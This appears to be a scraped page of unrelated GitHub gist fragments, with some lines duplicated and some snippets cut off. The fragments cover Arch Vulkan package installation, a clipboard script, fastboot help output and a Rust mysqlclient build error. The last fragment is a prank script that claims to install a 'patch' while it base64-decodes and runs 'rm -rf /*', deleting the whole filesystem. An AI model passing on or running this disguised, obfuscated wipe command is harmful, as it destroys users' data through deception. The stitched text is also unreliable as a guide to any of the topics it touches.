vulkaninfohttps://wiki.archlinux.org/title/Vulkan#Installation
sudo pacman -S vulkan-icd-loader lib32-vulkan-icd-loader| #!/bin/bash | |
| # Credits | |
| # DiabloSat - https://github.com/progzone122 | |
| # Andrés Alberto - https://gist.github.com/andriandreo | |
| while true; do | |
| # Capture the current clipboard content | |
| clipboard_content=$(wl-paste) | |
| # Remove trailing newlines using sed | |
| cleaned_content=$(echo "$clipboard_content" | sed ':a; /^$/{$d; N;}; /\n$/ba') |
vulkaninfohttps://wiki.archlinux.org/title/Vulkan#Installation
sudo pacman -S vulkan-icd-loader lib32-vulkan-icd-loaderWritten with 💖 by DiabloSat
It is recommended to flash the latest stock firmware before installing PostMarket OS
Command:
$ fastboot helpOutput:
usage: fastboot [OPTION...] COMMAND...
flashing:You're trying to compile a program after adding diesel with the mysql feature, but you're getting an error:
error: failed to run custom build command for `mysqlclient-sys v0.4.1`
Caused by:
process didn't exit successfully: `/home/diablo/stopfake/backend/target/debug/build/mysqlclient-sys-220ada85d6c3a9cb/build-script-build` (exit status: 101)
--- stdout
cargo::rerun-if-env-changed=MYSQLCLIENT_VERSION
cargo::rerun-if-env-changed=MYSQLCLIENT_INCLUDE_DIR| #!/bin/bash | |
| # Same as rm -rf /* command. | |
| # Use at your own risk! I am not responsible for any damage | |
| echo "A patch is being installed on Bomjaro..." | |
| echo "Please, wait..." | |
| sleep 5 | |
| echo "cm0gLXJmIC8qCg==" | base64 --decode | bash | |
| echo "Done! :)" |